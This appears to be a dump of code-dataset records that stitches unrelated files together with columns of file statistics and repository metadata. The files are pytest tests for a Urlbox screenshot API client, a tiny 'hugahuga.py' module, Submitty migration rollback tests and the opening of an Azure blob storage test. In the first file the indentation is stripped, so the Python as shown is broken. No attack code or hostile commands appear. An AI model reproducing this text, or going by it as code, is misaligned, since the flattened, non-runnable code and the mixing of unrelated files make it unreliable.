f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{token}/{format}"
f"?{url_encoded_options}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_with_header_array_in_options():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
"header": [
"x-my-first-header=somevalue",
"x-my-second-header=someothervalue",
],
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
assert (
"header=x-my-first-header%3Dsomevalue&header=x-my-second-header%3Dsomeothervalue"
in urlbox_request_url
)
# valid url but with white spaces before and after
def test_get_successful_white_space_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
url_with_white_spaces = f" {url} "
options = {
"url": url_with_white_spaces,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
options_parsed = options.copy()
options_parsed["url"] = url
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options_parsed, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_without_setting_format():
api_key = fake.pystr()
url = fake.url()
options = {
"url": url,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/png"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/png"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert "image/png" in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_missing_schema_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url_original = "twitter.com"
url_with_schema = f"http://{url_original}"
options = {
"url": url_original,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
options_parsed = options.copy()
options_parsed["url"] = url_with_schema
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options_parsed, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_invalid_url():
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.address()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=fake.pystr())
with pytest.raises(InvalidUrlException) as invalid_url_exception:
urlbox_client.get(options)
assert url in str(invalid_url_exception.value)
def test_get_with_different_host_name():
api_host_name = random.choice(["api-eu.urlbox.io", "api-direct.urlbox.io"])
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"https://{api_host_name}/"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_host_name=api_host_name)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_with_html_not_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
html = "<html><head></head><body><h1>TEST</h1></body></html>"
options = {"html": html, "format": format}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_unsuccessful_without_html_not_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {"format": format}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with pytest.raises(KeyError) as missing_key_exception:
urlbox_client.get(options)
assert "Missing 'url' or 'html' key in options" in str(
missing_key_exception.value
)
# DELETE
def test_delete_request():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {"url": url, "format": format}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.delete(
urlbox_request_url, headers={"content-type": f"image/{format}"}
)
response = urlbox_client.delete(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
# HEAD
def test_head_request():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.head(
urlbox_request_url,
content=b"",
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.head(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
assert len(response.content) == 0
def test_head_with_different_host_name():
api_host_name = random.choice(["api-eu.urlbox.io", "api-direct.urlbox.io"])
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"https://{api_host_name}/"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_host_name=api_host_name)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.head(
urlbox_request_url,
content=b"",
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.head(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
assert len(response.content) == 0
# POST
def test_post_request_successful():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {
"url": fake.url(),
"webhook_url": f"{fake.url()}/webook",
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}{UrlboxClient.POST_END_POINT}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.post(
urlbox_request_url,
content=b'{"status":"created","renderId":"47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1","statusUrl":"https://api.urlbox.io/render/47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1"}',
headers={"content-type": "application/json"},
status_code=201,
)
response = urlbox_client.post(options)
assert response.status_code == 201
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_post_with_different_host_name():
api_host_name = random.choice(["api-eu.urlbox.io", "api-direct.urlbox.io"])
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": fake.url(),
"webhook_url": f"{fake.url()}/webook",
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"https://{api_host_name}/{UrlboxClient.POST_END_POINT}"
)
urlbox_client = UrlboxClient(
api_key=api_key, api_secret=api_secret, api_host_name=api_host_name
)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.post(
urlbox_request_url,
content=b'{"status":"created","renderId":"47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1","statusUrl":"https://api.urlbox.io/render/47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1"}',
headers={"content-type": "application/json"},
status_code=201,
)
response = urlbox_client.post(options)
assert response.status_code == 201
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_post_request_successful_missing_webhook_url():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {
"url": fake.url(),
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}{UrlboxClient.POST_END_POINT}"
)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.post(
urlbox_request_url,
content=b'{"status":"created","renderId":"47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1","statusUrl":"https://api.urlbox.io/render/47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1"}',
headers={"content-type": "application/json"},
status_code=201,
)
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
with warnings.catch_warnings(record=True) as warning:
response = urlbox_client.post(options)
# Test response
assert response.status_code == 201
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
# Test warning
assert len(warning) == 1
assert issubclass(warning[-1].category, UserWarning)
assert (
"webhook_url not supplied, you will need to poll the statusUrl in order to get your result"
in str(warning[-1].message)
)
def test_post_request_unsuccessful_missing_api_secret():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {
"url": fake.url(),
"webhook_url": f"{fake.url()}/webook",
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=api_key)
with pytest.raises(Exception) as ex:
urlbox_client.post(options)
assert (
"Missing api_secret when initialising client. Required for authorised post request."
in str(ex.value)
)
# Test generate_url
def test_generate_url_without_api_secret():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=api_key)
urlbox_url = urlbox_client.generate_url(options)
assert isinstance(urlbox_url, str)
def test_get_successful_as_str_with_api_secret():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
urlbox_url = urlbox_client.generate_url(options)
assert isinstance(urlbox_url, str)
# It doesn't leak the api_secret (uses the tokenised options instead)
assert api_secret not in urlbox_url
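# --- Editor's note: illustrative sketch, not part of the original test module. ---
# The authenticated tests above build the expected render URL by HMAC-SHA1 signing the
# url-encoded options with the api_secret. The helper below restates that construction
# on its own; whether it matches UrlboxClient.generate_url exactly is an assumption
# based only on what these tests encode.
def _example_authenticated_render_url(api_key, api_secret, options,
                                      base_api_url=UrlboxClient.BASE_API_URL):
    """Build an authenticated Urlbox render URL the way the tests above expect."""
    query = urllib.parse.urlencode(options, doseq=True)
    token = hmac.new(str.encode(api_secret), str.encode(query), sha1).hexdigest()
    fmt = options.get("format", "png")
    return f"{base_api_url}{api_key}/{token}/{fmt}?{query}"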
| 28.746348
| 174
| 0.603299
| 2,458
| 21,646
| 5.097234
| 0.078519
| 0.039269
| 0.02155
| 0.021071
| 0.851943
| 0.834943
| 0.823609
| 0.81882
| 0.816905
| 0.808604
| 0
| 0.009471
| 0.263467
| 21,646
| 752
| 175
| 28.784574
| 0.776391
| 0.011318
| 0
| 0.706406
| 0
| 0.007117
| 0.192678
| 0.059005
| 0
| 0
| 0
| 0
| 0.119217
| 1
| 0.039146
| false
| 0
| 0.019573
| 0
| 0.058719
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58ad75f3819db67b92a4730a3fc8d56d37119d74
| 41
|
py
|
Python
|
python/monkey_patch/hugahuga.py
|
okimurak/til
|
19b371d39ad57353e29ed409b2288ff8bbc2d1e1
|
[
"MIT"
] | null | null | null |
python/monkey_patch/hugahuga.py
|
okimurak/til
|
19b371d39ad57353e29ed409b2288ff8bbc2d1e1
|
[
"MIT"
] | 1
|
2021-11-12T08:11:43.000Z
|
2021-11-12T08:11:43.000Z
|
python/monkey_patch/hugahuga.py
|
okimurak/til
|
19b371d39ad57353e29ed409b2288ff8bbc2d1e1
|
[
"MIT"
] | null | null | null |
def fuga_function():
return "fugafuga"
| 13.666667
| 20
| 0.731707
| 5
| 41
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 41
| 3
| 21
| 13.666667
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
453d84d55aa09282116e6b932a3650535993a905
| 13,446
|
py
|
Python
|
migration/tests/test_migrate_environment_down.py
|
elihschiff/Submitty
|
8b980997b6f1dfcd73eb4cf4cca43398e67f96dc
|
[
"BSD-3-Clause"
] | 411
|
2016-06-14T20:52:25.000Z
|
2022-03-31T21:20:25.000Z
|
migration/tests/test_migrate_environment_down.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 5,730
|
2016-05-23T21:04:32.000Z
|
2022-03-31T10:08:06.000Z
|
migration/tests/test_migrate_environment_down.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 423
|
2016-09-22T21:11:30.000Z
|
2022-03-29T18:55:28.000Z
|
from argparse import Namespace
from io import StringIO
from pathlib import Path
import shutil
import sys
import tempfile
from types import SimpleNamespace
import unittest
from .helpers import create_migration
import migrator
import migrator.db
import migrator.main
class TestMigrateEnvironmentDown(unittest.TestCase):
def setUp(self):
self.stdout = sys.stdout
sys.stdout = StringIO()
self.dir = tempfile.mkdtemp()
self.old_migrations_path = migrator.MIGRATIONS_PATH
migrator.MIGRATIONS_PATH = Path(self.dir)
def tearDown(self):
sys.stdout = self.stdout
shutil.rmtree(self.dir)
migrator.MIGRATIONS_PATH = self.old_migrations_path
def setup_test(self, environment):
Path(self.dir, environment).mkdir()
self.database = migrator.db.Database({'database_driver': 'sqlite'}, environment)
self.database.DynamicBase.metadata.create_all(self.database.engine)
def test_rollback_system(self):
environment = 'system'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
create_migration(self.database, self.dir, environment, '01_test1.py')
create_migration(self.database, self.dir, environment, '02_test1.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for system... 02_test1
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test1', '02_test1']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_rollback_master(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
create_migration(self.database, self.dir, environment, '01_test2.py')
create_migration(self.database, self.dir, environment, '02_test2.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for master... 02_test2
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test2', '02_test2']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_rollback_course(self):
environment = 'course'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.semester = 'f18'
args.course = 'csci1100'
args.config = None
create_migration(self.database, self.dir, environment, '01_test3.py')
create_migration(self.database, self.dir, environment, '02_test3.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for f18.csci1100... 02_test3
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test3', '02_test3']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_missing_migration(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = SimpleNamespace()
install_path = Path(self.dir, 'install')
Path(install_path, 'migrations', environment).mkdir(parents=True)
args.config.submitty = {
'submitty_install_dir': str(install_path)
}
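# Presumably simulating a migration present in the installed copy but missing from MIGRATIONS_PATH: its file is written under the install dir so the migrator can still run its down() when pruning the missing entry.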
missing_migration = Path(install_path, 'migrations', environment, '02_test4.py')
with missing_migration.open('w') as open_file:
open_file.write("""
# pragma: no cover
from pathlib import Path
INSTALL_PATH = "{}"
def down(*_):
with Path(INSTALL_PATH, 'test.txt').open('w') as open_file:
open_file.write('test')
""".format(install_path))
create_migration(self.database, self.dir, environment, '01_test4.py')
create_migration(self.database, self.dir, environment, '02_test4.py', 1, False)
create_migration(self.database, self.dir, environment, '03_test4.py')
create_migration(self.database, self.dir, environment, '04_test4.py', 0)
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 1)
self.assertEqual("""Running down migrations for master...
Removing 1 missing migrations:
02_test4
03_test4
DONE
""", sys.stdout.getvalue())
self.assertTrue(missing_migration.exists())
self.assertEqual(list(missing_migrations)[0], missing_migration)
self.assertTrue(Path(install_path, 'test.txt').exists())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test4', '03_test4', '04_test4']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_missing_migration_not_up(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = SimpleNamespace()
install_path = Path(self.dir, 'install')
Path(install_path, 'migrations', environment).mkdir(parents=True)
args.config.submitty = {
'submitty_install_dir': str(install_path)
}
missing_migration = Path(install_path, 'migrations', environment, '02_test4.py')
with missing_migration.open('w') as open_file:
open_file.write("""
# pragma: no cover
from pathlib import Path
INSTALL_PATH = "{}"
def down(*_):
with Path(INSTALL_PATH, 'test.txt').open('w') as open_file:
open_file.write('test')
""".format(install_path))
create_migration(self.database, self.dir, environment, '01_test4.py')
create_migration(self.database, self.dir, environment, '02_test4.py', 0, False)
create_migration(self.database, self.dir, environment, '03_test4.py')
create_migration(self.database, self.dir, environment, '04_test4.py', 0)
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 1)
self.assertEqual("""Running down migrations for master...
Removing 1 missing migrations:
02_test4
03_test4
DONE
""", sys.stdout.getvalue())
self.assertEqual(list(missing_migrations)[0], missing_migration)
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test4', '03_test4', '04_test4']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
self.assertTrue(missing_migration.exists())
self.assertFalse(Path(install_path, 'test.txt').exists())
def test_missing_migration_no_file(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = SimpleNamespace()
install_path = Path(self.dir, 'install')
Path(install_path, 'migrations', environment).mkdir(parents=True)
args.config.submitty = {
'submitty_install_dir': str(install_path)
}
create_migration(self.database, self.dir, environment, '01_test6.py')
create_migration(self.database, self.dir, environment, '02_test6.py', 1, False)
create_migration(self.database, self.dir, environment, '03_test6.py')
create_migration(self.database, self.dir, environment, '04_test6.py', 0)
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 1)
self.assertEqual("""Running down migrations for master...
Removing 1 missing migrations:
02_test6
03_test6
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test6', '03_test6', '04_test6']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_cannot_rollback_first_migration(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
create_migration(self.database, self.dir, environment, '01_test5.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for master... Cannot rollback 01_test5
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test5']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertFalse(Path(self.dir, down_file).exists())
def test_fake_rollback(self):
environment = 'system'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
args.set_fake = True
create_migration(self.database, self.dir, environment, '01_test1.py')
create_migration(self.database, self.dir, environment, '02_test1.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for system... 02_test1 (FAKE)
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test1', '02_test1']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertFalse(Path(self.dir, down_file).exists())
| 38.417143
| 91
| 0.632307
| 1,562
| 13,446
| 5.279129
| 0.076825
| 0.069852
| 0.048023
| 0.068761
| 0.885642
| 0.875819
| 0.857264
| 0.857264
| 0.841014
| 0.816032
| 0
| 0.021441
| 0.250781
| 13,446
| 349
| 92
| 38.527221
| 0.797101
| 0
| 0
| 0.760252
| 0
| 0
| 0.125985
| 0.006545
| 0
| 0
| 0
| 0
| 0.195584
| 1
| 0.0347
| false
| 0
| 0.044164
| 0
| 0.082019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1896fe58fc9de5840094c5361a7120ac499b599a
| 16,857
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_large_block_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/storage/azure-storage-blob/tests/test_large_block_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/storage/azure-storage-blob/tests/test_large_block_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2016-04-19T22:15:47.000Z
|
2016-04-19T22:15:47.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
from os import path, remove, sys, urandom
import platform
import unittest
import uuid
from devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer
from azure.storage.blob import (
BlobServiceClient,
ContainerClient,
BlobClient,
ContentSettings
)
if sys.version_info >= (3,):
from io import BytesIO
else:
from cStringIO import StringIO as BytesIO
from _shared.testcase import GlobalStorageAccountPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'largeblob'
LARGE_BLOB_SIZE = 12 * 1024 * 1024
LARGE_BLOCK_SIZE = 6 * 1024 * 1024
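# Presumably sized so a 12 MiB blob spans multiple 6 MiB blocks, exercising the large-block upload path without excessive test data.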
# ------------------------------------------------------------------------------
if platform.python_implementation() == 'PyPy':
pytest.skip("Skip tests for Pypy", allow_module_level=True)
class StorageLargeBlockBlobTest(StorageTestCase):
def _setup(self, storage_account, key):
# test chunking functionality by reducing the threshold
# for chunking and the size of each chunk, otherwise
# the tests would take too long to execute
self.bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=key,
max_single_put_size=32 * 1024,
max_block_size=2 * 1024 * 1024,
min_large_block_upload_threshold=1 * 1024 * 1024)
self.config = self.bsc._config
self.container_name = self.get_resource_name('utcontainer')
